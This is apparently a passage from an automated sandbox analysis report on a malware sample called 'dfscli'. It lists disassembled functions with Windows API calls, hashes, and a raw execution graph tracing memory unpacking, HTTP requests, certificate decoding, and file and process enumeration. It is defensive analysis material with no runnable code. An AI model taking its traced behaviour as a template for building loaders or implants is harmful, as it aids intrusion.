                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                  • API String ID: 3534257612-2801496823
                                                                  • Opcode ID: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction ID: 4ba1055b97871b79f2e7e250bc91374e937afd52b24a3d5666128ff83e3a1e39
                                                                  • Opcode Fuzzy Hash: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction Fuzzy Hash: 992130B1A00219AB8F10EF96E8419DE7BB8BE58354F50406BF908E3251E7389951CBA9
                                                                  Function 021C2430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021C2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021C24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  • Opcode ID: 661880b2a81309fe8c72b2b4d9b0e5009c1a783bdcc69007570b72eefcee6f72
                                                                  • Instruction ID: d4f62bde6ad7831b35d4f3da9267c9b3f72e13b0ae3136176f4fc2e9034f385b
                                                                  • Opcode Fuzzy Hash: 661880b2a81309fe8c72b2b4d9b0e5009c1a783bdcc69007570b72eefcee6f72
                                                                  • Instruction Fuzzy Hash: D721E5B8E44209EFDF14CF98C980BAEBBB5BF54308F208599DD15AB240C774AB80DB55
                                                                  Function 00425FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405C41: GetWindowExtEx.GDI32(?,?), ref: 00405C4D
                                                                    • Part of subcall function 00405C1D: GetViewportExtEx.GDI32(?,?), ref: 00405C29
                                                                  • MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                  • MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ViewportWindow
                                                                  • String ID: Fw@
                                                                  • API String ID: 1589084482-2650048193
                                                                  • Opcode ID: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
                                                                  • Instruction ID: 608e97be970086dca0e1fa4dc7a0ff41e63cb8bbaa647bae0e741146e3f8859e
                                                                  • Opcode Fuzzy Hash: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
                                                                  • Instruction Fuzzy Hash: 2AF06276900218BFDB207FA59C05C9FBBACDE44214B15043AF940B3152FA75AD108E54
                                                                  Function 00422479 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: (C$8C
                                                                  • API String ID: 3519838083-3442521767
                                                                  • Opcode ID: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction ID: 7ee2ab24155dd1533db6df93568111abed88cbadf2414e72971fbd093de00081
                                                                  • Opcode Fuzzy Hash: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction Fuzzy Hash: 1D017571F01170AFD738BB19A6447AEB2A0AF08710F46826FA05997690CBBC8C408A49
                                                                  Function 00429BB8 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                  • LocalFree.KERNEL32(?), ref: 00429C2E
                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                  • String ID:
                                                                  • API String ID: 2949335588-0
                                                                  • Opcode ID: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction ID: 4f4236dd2a41b9a2d9142ab37103e81bc3eebe3eca6605d7b1983f38d4fab71a
                                                                  • Opcode Fuzzy Hash: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction Fuzzy Hash: 2011AC34700610EFD720CF56E884B6AB7B4FF05315F90802EE1468B2A1CB75BC50CB18
                                                                  Function 00410D0F Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00411300,00000000,?,00000000), ref: 00410D36
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00411300,00000000,?,00000000), ref: 00410D6F
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00410D8D
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00410DA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction ID: 5ba2f75a3631e755b4902d4e05e9c9231f22547c1912ff447ca3f9ea5e59f1b4
                                                                  • Opcode Fuzzy Hash: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction Fuzzy Hash: 3E118FB4600200DFD7718F99FC45D627BB5FB82315760453AF296C62B0C770B8AACB18
                                                                  Function 00429F15 Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                  • LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429EAC: InitializeCriticalSection.KERNEL32(0043F21C,00429F23,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429EC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitialize$Leave
                                                                  • String ID:
                                                                  • API String ID: 713024617-0
                                                                  • Opcode ID: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction ID: 64048ed4fafcfd63e0d0b0e47ab2320bfea24fe3f3f20fa265999014551e40f8
                                                                  • Opcode Fuzzy Hash: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction Fuzzy Hash: 87F06D7690021ADFDB109F95FC84BA7B7ACFB14316F801437E60492021D739A86ACAAC

                                                                  Execution Graph

                                                                  Execution Coverage:6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:1.7%
                                                                  Total number of Nodes:541
                                                                  Total number of Limit Nodes:54
                                                                  execution_graph 12175 21f1890 12176 21f189c 12175->12176 12177 21f18b2 12175->12177 12200 21f3f20 GetPEB 12176->12200 12181 21f3f20 GetPEB 12177->12181 12185 21f18db 12177->12185 12182 21f18cf 12181->12182 12183 21f3e80 GetPEB 12182->12183 12183->12185 12184 21f193e 12185->12184 12190 21f2650 12185->12190 12187 21f1928 12188 21f192c 12187->12188 12216 21f4250 12187->12216 12199 21f2660 12190->12199 12191 21f277b 12191->12187 12192 21f2917 CryptDecodeObjectEx 12192->12199 12193 21f3f20 GetPEB 12193->12199 12194 21f2992 12196 21f4250 GetPEB 12194->12196 12197 21f299d 12196->12197 12197->12187 12198 21f3e80 GetPEB 12198->12199 12199->12191 12199->12192 12199->12193 12199->12194 12199->12198 12226 21f42f0 12199->12226 12201 21f18a6 12200->12201 12202 21f3e80 12201->12202 12203 21f3edc 12202->12203 12204 21f3ebc 12202->12204 12203->12177 12204->12203 12205 21f3f20 GetPEB 12204->12205 12209 21f4125 12204->12209 12206 21f4119 12205->12206 12207 21f3e80 GetPEB 12206->12207 12207->12209 12208 21f4156 12211 21f3e80 GetPEB 12208->12211 12213 21f4168 12208->12213 12209->12208 12210 21f3f20 GetPEB 12209->12210 12212 21f414a 12210->12212 12214 21f4187 12211->12214 12215 21f3e80 GetPEB 12212->12215 12213->12177 12214->12177 12215->12208 12217 21f425d 12216->12217 12218 21f4273 12216->12218 12219 21f3f20 GetPEB 12217->12219 12221 21f429b 12218->12221 12223 21f3f20 GetPEB 12218->12223 12220 21f4267 12219->12220 12222 21f3e80 GetPEB 12220->12222 12221->12184 12222->12218 12224 21f428f 12223->12224 12225 21f3e80 GetPEB 12224->12225 12225->12221 12227 21f42fd 12226->12227 12230 21f4313 12226->12230 12228 21f3f20 GetPEB 12227->12228 12229 21f4307 12228->12229 12232 21f3e80 GetPEB 12229->12232 12231 21f4340 RtlAllocateHeap 12230->12231 12233 21f3f20 GetPEB 12230->12233 12231->12199 12232->12230 12234 21f432f 12233->12234 12235 21f3e80 GetPEB 12234->12235 12236 21f433b 12235->12236 12236->12231 12730 21f1508 12749 21f12e1 12730->12749 12733 21f34c0 GetPEB 12733->12749 12736 21f3e80 GetPEB 12736->12749 12737 21f3f20 GetPEB 12737->12749 12738 21f1879 12743 21f4250 GetPEB 12738->12743 12739 21f4250 GetPEB 12739->12749 12742 21f17ef _snwprintf 12746 21f3460 GetPEB 12742->12746 12745 21f14b8 12743->12745 12746->12749 12748 21f42f0 GetPEB RtlAllocateHeap 12748->12749 12749->12733 12749->12736 12749->12737 12749->12738 12749->12739 12749->12742 12749->12745 12749->12748 12750 21f3460 GetPEB 12749->12750 12751 21f1950 12749->12751 12767 21f4ed0 12749->12767 12772 21f1fb0 12749->12772 12779 21f2c20 12749->12779 12799 21f1c70 12749->12799 12815 21f2290 12749->12815 12823 21f5bc0 12749->12823 12845 21f1e60 12749->12845 12750->12749 12757 21f196f 12751->12757 12752 21f19b1 12752->12749 12753 21f3f20 GetPEB 12753->12757 12754 21f1c12 12756 21f35c0 GetPEB 12754->12756 12755 21f4e60 GetPEB 12755->12757 12758 21f1c1c 12756->12758 12757->12752 12757->12753 12757->12754 12757->12755 12761 21f3e80 GetPEB 12757->12761 12766 21f35c0 GetPEB 12757->12766 12759 21f3f20 GetPEB 12758->12759 12760 21f1c3d 12758->12760 12762 21f1c31 12759->12762 12763 21f3460 GetPEB 12760->12763 12761->12757 12764 21f3e80 GetPEB 12762->12764 12765 21f1c57 12763->12765 12764->12760 12765->12749 12766->12757 12770 21f4ee6 12767->12770 12768 21f4f6d 12768->12749 12769 21f3f20 GetPEB 12769->12770 12770->12768 12770->12769 12771 21f3e80 GetPEB 12770->12771 12771->12770 12777 21f1fc8 12772->12777 12773 21f2265 12773->12749 12774 21f226f 12774->12773 12775 21f4250 GetPEB 12774->12775 12775->12773 12776 21f3f20 GetPEB 12776->12777 12777->12773 12777->12774 12777->12776 12778 21f3e80 GetPEB 12777->12778 12778->12777 12798 21f2c5a 12779->12798 12780 21f2dee InternetOpenW 12780->12798 12781 21f3027 12781->12749 12782 21f3008 12782->12781 12790 21f3f20 GetPEB 12782->12790 12783 21f2dbd InternetCloseHandle 12783->12798 12784 21f2fcc InternetConnectW 12784->12798 12785 21f29b0 GetPEB 12785->12798 12786 21f3f20 GetPEB 12786->12798 12787 21f42f0 2 API calls 12787->12798 12788 21f3e80 GetPEB 12788->12798 12789 21f34c0 GetPEB 12789->12798 12791 21f301b 12790->12791 12792 21f3e80 GetPEB 12791->12792 12792->12781 12793 21f2ccc HttpSendRequestW 12793->12798 12794 21f2ed3 ObtainUserAgentString 12794->12798 12795 21f3460 GetPEB 12795->12798 12796 21f56a0 GetPEB 12796->12798 12797 21f4250 GetPEB 12797->12798 12798->12780 12798->12781 12798->12782 12798->12783 12798->12784 12798->12785 12798->12786 12798->12787 12798->12788 12798->12789 12798->12793 12798->12794 12798->12795 12798->12796 12798->12797 12800 21f1cd6 12799->12800 12801 21f1cec 12799->12801 12802 21f3f20 GetPEB 12800->12802 12805 21f1d9f 12801->12805 12806 21f3f20 GetPEB 12801->12806 12803 21f1ce0 12802->12803 12804 21f3e80 GetPEB 12803->12804 12804->12801 12809 21f1dd3 12805->12809 12810 21f3f20 GetPEB 12805->12810 12807 21f1d93 12806->12807 12808 21f3e80 GetPEB 12807->12808 12808->12805 12813 21f4ed0 GetPEB 12809->12813 12811 21f1dc7 12810->12811 12812 21f3e80 GetPEB 12811->12812 12812->12809 12814 21f1e07 12813->12814 12814->12749 12817 21f22b5 12815->12817 12816 21f2300 12816->12749 12817->12816 12818 21f2627 12817->12818 12819 21f3f20 GetPEB 12817->12819 12821 21f3e80 GetPEB 12817->12821 12820 21f2636 12818->12820 12822 21f4250 GetPEB 12818->12822 12819->12817 12820->12749 12821->12817 12822->12820 12824 21f5be6 12823->12824 12825 21f5bd0 12823->12825 12828 21f5c13 RtlAllocateHeap 12824->12828 12830 21f3f20 GetPEB 12824->12830 12826 21f3f20 GetPEB 12825->12826 12827 21f5bda 12826->12827 12829 21f3e80 GetPEB 12827->12829 12831 21f5c92 12828->12831 12836 21f5c23 12828->12836 12829->12824 12832 21f5c02 12830->12832 12831->12749 12833 21f3e80 GetPEB 12832->12833 12834 21f5c0e 12833->12834 12834->12828 12835 21f5c59 12839 21f5c86 RtlFreeHeap 12835->12839 12841 21f3f20 GetPEB 12835->12841 12836->12835 12837 21f3f20 GetPEB 12836->12837 12838 21f5c4d 12837->12838 12840 21f3e80 GetPEB 12838->12840 12839->12749 12840->12835 12842 21f5c75 12841->12842 12843 21f3e80 GetPEB 12842->12843 12844 21f5c81 12843->12844 12844->12839 12852 21f1e76 12845->12852 12846 21f1f67 12847 21f1f58 12846->12847 12848 21f3f20 GetPEB 12846->12848 12847->12749 12850 21f1f88 12848->12850 12849 21f3f20 GetPEB 12849->12852 12851 21f3e80 GetPEB 12850->12851 12851->12847 12852->12846 12852->12847 12852->12849 12853 21f3e80 GetPEB 12852->12853 12853->12852 12383 2180000 12385 2180005 12383->12385 12388 218002d 12385->12388 12408 2180456 GetPEB 12388->12408 12391 2180456 GetPEB 12392 2180053 12391->12392 12393 2180456 GetPEB 12392->12393 12394 2180061 12393->12394 12395 2180456 GetPEB 12394->12395 12396 218006d 12395->12396 12397 2180456 GetPEB 12396->12397 12398 218007b 12397->12398 12399 2180456 GetPEB 12398->12399 12402 2180089 12399->12402 12400 21800e4 GetNativeSystemInfo 12401 2180107 VirtualAlloc 12400->12401 12406 2180029 12400->12406 12404 218012f 12401->12404 12402->12400 12402->12406 12403 21803b2 12410 21b27b0 12403->12410 12404->12403 12405 2180388 VirtualProtect 12404->12405 12405->12404 12405->12406 12409 2180045 12408->12409 12409->12391 12413 21b1000 12410->12413 12416 21b1030 LoadLibraryW GetProcAddress 12413->12416 12457 21b1b30 12416->12457 12419 21b10a3 12421 21b1b30 SetLastError 12419->12421 12420 21b1091 SetLastError 12453 21b102b ExitProcess 12420->12453 12422 21b10b9 12421->12422 12423 21b10de SetLastError 12422->12423 12424 21b10f0 12422->12424 12422->12453 12423->12453 12425 21b10ff SetLastError 12424->12425 12426 21b1111 12424->12426 12425->12453 12427 21b111c SetLastError 12426->12427 12429 21b112e GetNativeSystemInfo 12426->12429 12427->12453 12430 21b11bc 12429->12430 12431 21b11e9 12430->12431 12432 21b11d7 SetLastError 12430->12432 12460 21b1800 VirtualAlloc 12431->12460 12432->12453 12433 21b1202 12434 21b123d GetProcessHeap RtlAllocateHeap 12433->12434 12461 21b1800 VirtualAlloc 12433->12461 12435 21b127b 12434->12435 12436 21b1257 SetLastError 12434->12436 12440 21b1b30 SetLastError 12435->12440 12436->12453 12437 21b1222 12437->12434 12438 21b122e SetLastError 12437->12438 12438->12453 12441 21b12fb 12440->12441 12442 21b1302 12441->12442 12462 21b1800 VirtualAlloc 12441->12462 12488 21b16c0 12442->12488 12444 21b1320 12463 21b1b50 12444->12463 12446 21b136b 12446->12442 12469 21b21a0 12446->12469 12450 21b13ca 12450->12442 12451 21b13eb 12450->12451 12452 21b13ff GetPEB 12451->12452 12451->12453 12452->12453 12458 21b1b3b SetLastError 12457->12458 12459 21b1070 12457->12459 12458->12459 12459->12419 12459->12420 12459->12453 12460->12433 12461->12437 12462->12444 12466 21b1b7d 12463->12466 12464 21b1b30 SetLastError 12465 21b1c32 12464->12465 12467 21b1be9 12465->12467 12496 21b1800 VirtualAlloc 12465->12496 12466->12464 12466->12467 12467->12446 12470 21b21dd IsBadHugeReadPtr 12469->12470 12471 21b13b5 12469->12471 12470->12471 12473 21b2207 12470->12473 12471->12442 12482 21b1e80 12471->12482 12473->12471 12474 21b2239 SetLastError 12473->12474 12475 21b224d 12473->12475 12474->12471 12497 21b1a20 12475->12497 12478 21b229d 12478->12471 12481 21b23ae SetLastError 12478->12481 12479 21b2273 SetLastError 12479->12471 12481->12471 12485 21b1eba 12482->12485 12483 21b1fe5 12484 21b1d10 2 API calls 12483->12484 12487 21b1fc1 12484->12487 12485->12483 12485->12487 12512 21b1d10 12485->12512 12487->12450 12489 21b16d2 12488->12489 12490 21b16d7 12488->12490 12489->12453 12491 21b19d0 VirtualFree 12490->12491 12492 21b170b 12491->12492 12494 21b1770 GetProcessHeap HeapFree 12492->12494 12495 21b19d0 VirtualFree 12492->12495 12494->12489 12495->12494 12496->12467 12498 21b1a35 12497->12498 12499 21b1a2c 12497->12499 12502 21b1a43 12498->12502 12508 21b19f0 VirtualAlloc 12498->12508 12505 21b1900 12499->12505 12502->12478 12502->12479 12503 21b1a51 12503->12502 12509 21b19d0 12503->12509 12506 21b190c 12505->12506 12507 21b1910 VirtualQuery 12505->12507 12506->12498 12507->12506 12508->12503 12510 21b19ea 12509->12510 12511 21b19d9 VirtualFree 12509->12511 12510->12502 12511->12510 12513 21b1d29 12512->12513 12516 21b1d1f 12512->12516 12514 21b1d37 12513->12514 12515 21b1d9d VirtualProtect 12513->12515 12514->12516 12519 21b1820 VirtualFree 12514->12519 12515->12516 12516->12485 12519->12516 14423 21f99b8 14434 21f99c0 14423->14434 14424 21f9bd0 14425 21f3f20 GetPEB 14424->14425 14427 21f9bc3 14424->14427 14428 21f9be3 14425->14428 14426 21f9b65 FindFirstChangeNotificationW 14429 21f9c10 4 API calls 14426->14429 14431 21f3e80 GetPEB 14428->14431 14429->14434 14430 21f9c10 4 API calls 14430->14434 14431->14427 14432 21f3f20 GetPEB 14432->14434 14433 21f3e80 GetPEB 14433->14434 14434->14424 14434->14426 14434->14427 14434->14430 14434->14432 14434->14433 12283 21f6fb0 12288 21f6fb5 12283->12288 12284 21f6f10 GetPEB LoadLibraryW 12284->12288 12285 21f70bf 12304 21f34c0 12285->12304 12286 21f70be 12288->12284 12288->12285 12288->12286 12290 21f70f1 LoadLibraryW 12291 21f7106 12290->12291 12292 21f711c 12290->12292 12294 21f3f20 GetPEB 12291->12294 12300 21f3f20 GetPEB 12292->12300 12303 21f7144 12292->12303 12293 21f3f20 GetPEB 12295 21f70e0 12293->12295 12296 21f7110 12294->12296 12297 21f3e80 GetPEB 12295->12297 12298 21f3e80 GetPEB 12296->12298 12299 21f70ec 12297->12299 12298->12292 12299->12290 12301 21f7138 12300->12301 12302 21f3e80 GetPEB 12301->12302 12302->12303 12305 21f34e3 12304->12305 12306 21f3f20 GetPEB 12305->12306 12307 21f3508 12305->12307 12308 21f34fc 12306->12308 12310 21f3f20 GetPEB 12307->12310 12313 21f3530 12307->12313 12309 21f3e80 GetPEB 12308->12309 12309->12307 12311 21f3524 12310->12311 12312 21f3e80 GetPEB 12311->12312 12312->12313 12313->12290 12313->12293 12520 21f2c20 12539 21f2c5a 12520->12539 12521 21f2dee InternetOpenW 12521->12539 12522 21f3027 12523 21f3008 12523->12522 12531 21f3f20 GetPEB 12523->12531 12524 21f2dbd InternetCloseHandle 12524->12539 12525 21f2fcc InternetConnectW 12525->12539 12527 21f3f20 GetPEB 12527->12539 12528 21f42f0 2 API calls 12528->12539 12529 21f3e80 GetPEB 12529->12539 12530 21f34c0 GetPEB 12530->12539 12532 21f301b 12531->12532 12533 21f3e80 GetPEB 12532->12533 12533->12522 12534 21f2ccc HttpSendRequestW 12534->12539 12535 21f2ed3 ObtainUserAgentString 12535->12539 12536 21f3460 GetPEB 12536->12539 12538 21f4250 GetPEB 12538->12539 12539->12521 12539->12522 12539->12523 12539->12524 12539->12525 12539->12527 12539->12528 12539->12529 12539->12530 12539->12534 12539->12535 12539->12536 12539->12538 12540 21f29b0 12539->12540 12553 21f56a0 12539->12553 12551 21f29d0 12540->12551 12541 21f2b3f 12541->12539 12542 21f2af2 12542->12541 12543 21f2b17 12542->12543 12544 21f3f20 GetPEB 12542->12544 12543->12541 12549 21f3f20 GetPEB 12543->12549 12546 21f2b0b 12544->12546 12545 21f3e80 GetPEB 12545->12551 12547 21f3e80 GetPEB 12546->12547 12547->12543 12548 21f3f20 GetPEB 12548->12551 12550 21f2b33 12549->12550 12552 21f3e80 GetPEB 12550->12552 12551->12542 12551->12545 12551->12548 12552->12541 12555 21f56b1 12553->12555 12554 21f57a2 12556 21f579b 12554->12556 12557 21f3f20 GetPEB 12554->12557 12555->12554 12555->12556 12560 21f3f20 GetPEB 12555->12560 12561 21f3e80 GetPEB 12555->12561 12556->12539 12558 21f57b5 12557->12558 12559 21f3e80 GetPEB 12558->12559 12559->12556 12560->12555 12561->12555 12237 21f30d0 12238 21f30ea 12237->12238 12239 21f32b5 12238->12239 12241 21f3f20 GetPEB 12238->12241 12243 21f31df 12238->12243 12245 21f317a RtlAllocateHeap 12238->12245 12246 21f3e80 GetPEB 12238->12246 12240 21f3f20 GetPEB 12239->12240 12239->12243 12242 21f32c9 12240->12242 12241->12238 12244 21f3e80 GetPEB 12242->12244 12244->12243 12245->12238 12245->12243 12246->12238 12314 21f96c9 12326 21f96d0 12314->12326 12315 21f9948 12317 21f9967 12315->12317 12318 21f3f20 GetPEB 12315->12318 12316 21f993c 12337 21f3070 12317->12337 12322 21f995b 12318->12322 12319 21f3f20 GetPEB 12319->12326 12321 21f42f0 2 API calls 12321->12326 12323 21f3e80 GetPEB 12322->12323 12323->12317 12324 21f3e80 GetPEB 12324->12326 12326->12315 12326->12316 12326->12319 12326->12321 12326->12324 12327 21f7ab0 12326->12327 12332 21f7ad0 12327->12332 12328 21f7c17 12331 21f3f20 GetPEB 12328->12331 12335 21f7c37 12328->12335 12329 21f3f20 GetPEB 12329->12332 12330 21f7bd6 12330->12326 12333 21f7c2b 12331->12333 12332->12328 12332->12329 12332->12330 12334 21f3e80 GetPEB 12332->12334 12336 21f3e80 GetPEB 12333->12336 12334->12332 12335->12326 12336->12335 12338 21f3080 12337->12338 12340 21f30aa 12338->12340 12342 21f38f0 12338->12342 12340->12316 12341 21f30c2 12341->12316 12357 21f3910 12342->12357 12343 21f3a50 FindFirstFileW 12347 21f3b93 12343->12347 12343->12357 12344 21f3941 12344->12341 12345 21f3f20 GetPEB 12345->12357 12346 21f34c0 GetPEB 12346->12357 12347->12341 12348 21f3b6c 12350 21f3b90 FindClose 12348->12350 12351 21f3f20 GetPEB 12348->12351 12349 21f3970 FindNextFileW 12349->12357 12350->12347 12352 21f3b7f 12351->12352 12354 21f3e80 GetPEB 12352->12354 12353 21f3e80 GetPEB 12353->12357 12355 21f3b8b 12354->12355 12355->12350 12356 21f38f0 GetPEB 12356->12357 12357->12343 12357->12344 12357->12345 12357->12346 12357->12348 12357->12349 12357->12353 12357->12356 12359 21f3460 12357->12359 12360 21f346d 12359->12360 12365 21f3483 12359->12365 12361 21f3f20 GetPEB 12360->12361 12362 21f3477 12361->12362 12363 21f3e80 GetPEB 12362->12363 12363->12365 12364 21f34ab 12364->12357 12365->12364 12366 21f3f20 GetPEB 12365->12366 12367 21f349f 12366->12367 12368 21f3e80 GetPEB 12367->12368 12368->12364 12369 21f4cc8 12371 21f4cd0 12369->12371 12370 21f4d69 Process32FirstW 12370->12371 12371->12370 12372 21f4de8 12371->12372 12374 21f4db8 12371->12374 12375 21f3f20 GetPEB 12371->12375 12377 21f4d25 